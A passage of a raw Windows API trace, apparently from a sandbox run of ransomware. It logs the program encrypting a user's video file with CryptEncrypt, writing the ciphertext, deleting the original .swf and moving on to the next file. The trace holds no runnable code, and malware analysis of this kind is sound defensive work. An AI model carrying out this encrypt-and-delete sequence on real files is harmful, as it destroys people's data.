out: hHeap=0x1780000) returned 1 [0105.616] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0105.617] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0105.617] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0288 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41acc00 | out: hHeap=0x1780000) returned 1 [0105.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0105.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0105.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0105.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0105.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0105.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0105.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0105.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0105.618] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.618] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.618] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144de30*=0x10d75, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144de30*=0x10d80) returned 1 [0105.618] CharLowerBuffW (in: lpsz="byte[68993]", cchLength=0xb | out: lpsz="byte[68993]") returned 0xb [0105.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb168, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.619] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x499a008*, pdwDataLen=0x144de30*=0x10d75, dwBufLen=0x10d80 | out: pbData=0x499a008*, pdwDataLen=0x144de30*=0x10d80) returned 1 [0105.619] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.619] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.666] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x10d80, lpNumberOfBytesWritten=0x144e834, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144e834*=0x10d80, lpOverlapped=0x0) returned 1 [0105.669] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0105.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.669] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0105.669] CryptDestroyKey (hKey=0x41ac040) returned 1 [0105.669] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.670] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0105.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0105.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.670] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0105.670] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0105.670] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.670] FreeLibrary (hLibModule=0x756e0000) returned 1 [0105.670] CloseHandle (hObject=0x298) returned 1 [0105.670] CloseHandle (hObject=0x258) returned 1 [0105.674] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf", nBufferLength=0x7fff, lpBuffer=0x143e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf", lpFilePart=0x0) returned 0x5e [0105.674] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\hf dn4y4llhbc.swf")) returned 0x20 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0105.674] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0105.674] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf", lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc3fe2b0, ftCreationTime.dwHighDateTime=0x1d5e32d, ftLastAccessTime.dwLowDateTime=0xc02adcb0, ftLastAccessTime.dwHighDateTime=0x1d5ef34, ftLastWriteTime.dwLowDateTime=0xc02adcb0, ftLastWriteTime.dwHighDateTime=0x1d5ef34, nFileSizeHigh=0x0, nFileSizeLow=0x10d75, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Hf dn4y4LLHbc.swf", cAlternateFileName="HFDN4Y~1.SWF")) returned 0x41ac780 [0105.675] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\Hf dn4y4LLHbc.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\hf dn4y4llhbc.swf")) returned 1 [0105.676] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e878 | out: lpFindFileData=0x144e878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc3fe2b0, ftCreationTime.dwHighDateTime=0x1d5e32d, ftLastAccessTime.dwLowDateTime=0xc02adcb0, ftLastAccessTime.dwHighDateTime=0x1d5ef34, ftLastWriteTime.dwLowDateTime=0xc02adcb0, ftLastWriteTime.dwHighDateTime=0x1d5ef34, nFileSizeHigh=0x0, nFileSizeLow=0x10d75, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="Hf dn4y4LLHbc.swf", cAlternateFileName="HFDN4Y~1.SWF")) returned 0 [0105.676] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a80e8 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0105.677] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0105.677] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0105.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8260 | out: hHeap=0x1780000) returned 1 [0105.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0105.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0105.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0105.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0105.678] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0105.678] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0105.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0105.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0105.678] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0105.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0105.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0105.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0105.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0105.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7c50 [0105.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0105.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1a0) returned 0x43e8260 [0105.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7c50 | out: hHeap=0x1780000) returned 1 [0105.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0105.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0105.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0105.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0105.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0105.679] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0105.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0105.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0105.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0105.680] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0105.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0105.680] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\jgIUi-yVs0307RW IcX.mkv", lpFindFileData=0x144e718 | out: lpFindFileData=0x144e718*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b76150, ftCreationTime.dwHighDateTime=0x1d5ec8d, ftLastAccessTime.dwLowDateTime=0x60d86c30, ftLastAccessTime.dwHighDateTime=0x1d5e5c2, ftLastWriteTime.dwLowDateTime=0x60d86c30, ftLastWriteTime.dwHighDateTime=0x1d5e5c2, nFileSizeHigh=0x0, nFileSizeLow=0x3394, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="jgIUi-yVs0307RW IcX.mkv", cAlternateFileName="JGIUI-~1.MKV")) returned 0x41ac700 [0105.680] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0105.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0105.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0105.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0105.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0105.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0105.682] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0105.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0105.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0105.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0105.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0105.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 